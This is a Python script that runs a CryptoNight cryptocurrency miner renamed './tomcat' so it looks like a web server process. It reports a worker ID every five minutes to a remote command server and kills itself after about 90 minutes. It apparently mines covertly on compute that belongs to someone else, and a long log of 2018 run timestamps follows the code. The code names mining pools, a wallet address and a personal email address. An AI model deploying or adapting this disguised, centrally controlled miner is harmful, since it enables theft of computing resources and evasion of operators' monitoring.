import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:07.046119
#2018-02-17 16:17:05.809575
#2018-02-17 18:06:01.995762
#2018-02-17 19:53:04.117364
#2018-02-17 21:40:07.265081
#2018-02-17 23:24:05.725355
#2018-02-18 01:13:05.381989
#2018-02-18 02:59:05.836713
#2018-02-18 04:47:07.275551
#2018-02-18 06:39:01.399552
#2018-02-18 08:28:04.191888
#2018-02-18 10:15:02.355148
#2018-02-18 12:01:05.781623
#2018-02-18 13:46:07.703471
#2018-02-18 15:37:07.517169
#2018-02-18 17:24:07.338828
#2018-02-18 19:12:05.772959
#2018-02-18 20:59:01.998945
#2018-02-18 22:45:04.643023
#2018-02-19 00:34:04.413206
#2018-02-19 02:19:06.902596
#2018-02-19 04:07:07.196780
#2018-02-19 05:51:06.018085
#2018-02-19 07:39:03.556995
#2018-02-19 09:28:07.037405
#2018-02-19 11:17:08.022404
#2018-02-19 13:05:09.700253
#2018-02-19 14:53:07.354679
#2018-02-19 16:42:06.662548
#2018-02-19 18:31:01.755630
#2018-02-19 20:17:01.286827
#2018-02-19 22:06:07.031853
#2018-02-19 23:53:06.268142
#2018-02-20 01:40:04.582206
#2018-02-20 03:28:02.118173
#2018-02-20 05:15:03.240423
#2018-02-20 06:58:01.885400
#2018-02-20 08:45:10.340125
#2018-02-20 10:29:07.640690
#2018-02-20 12:14:06.087797
#2018-02-20 14:02:05.411844
#2018-02-20 15:45:12.429405
#2018-02-20 17:31:05.980218
#2018-02-20 19:19:04.870105
#2018-02-20 21:09:02.072831
#2018-02-20 22:54:04.350163
#2018-02-21 00:38:05.473185
#2018-02-21 02:24:06.360933
#2018-02-21 04:11:01.223581
#2018-02-21 05:58:03.404182
#2018-02-21 07:47:02.143389
#2018-02-21 09:33:06.773925
#2018-02-21 11:21:08.050614
#2018-02-21 13:09:08.546459
#2018-02-21 14:55:11.084407
#2018-02-21 16:45:09.031038
#2018-02-21 18:36:08.295733
#2018-02-21 20:21:05.934786
#2018-02-21 22:10:09.680608
#2018-02-21 23:58:01.298083
#2018-02-22 01:48:06.939317
#2018-02-22 03:34:02.083572
#2018-02-22 05:21:03.417257
#2018-02-22 07:05:07.805019
#2018-02-22 08:51:07.454486
#2018-02-22 10:39:07.269567
#2018-02-22 12:25:09.790079
#2018-02-22 14:10:10.198180
#2018-02-22 15:56:07.055650
#2018-02-22 17:44:10.120704
#2018-02-22 19:31:02.036409
#2018-02-22 21:22:06.660519
#2018-02-22 23:06:08.468421
#2018-02-23 00:54:02.211108
#2018-02-23 02:41:01.719109
#2018-02-23 04:28:06.395945
#2018-02-23 06:13:05.434071
#2018-02-23 07:59:03.852280
#2018-02-23 09:50:05.930422
#2018-02-23 11:54:06.425496
#2018-02-23 13:44:10.075355
#2018-02-23 15:33:01.543895
#2018-02-23 17:21:04.727066
#2018-02-23 19:06:05.273806
#2018-02-23 20:50:09.570773
#2018-02-23 22:32:01.635736
#2018-02-24 00:18:05.830921
#2018-02-24 02:11:05.484416
#2018-02-24 04:02:01.887018
#2018-02-24 06:43:04.940688
#2018-02-24 08:32:04.816514
#2018-02-24 10:20:06.048907
#2018-02-24 12:15:08.004489
#2018-02-24 14:06:06.385685
#2018-02-24 15:54:02.029693
#2018-02-24 17:45:07.465436
#2018-02-24 19:31:01.440340
#2018-02-24 21:19:04.325007
#2018-02-25 01:20:08.741253
#2018-02-25 05:26:07.587943
#2018-02-25 11:35:07.194520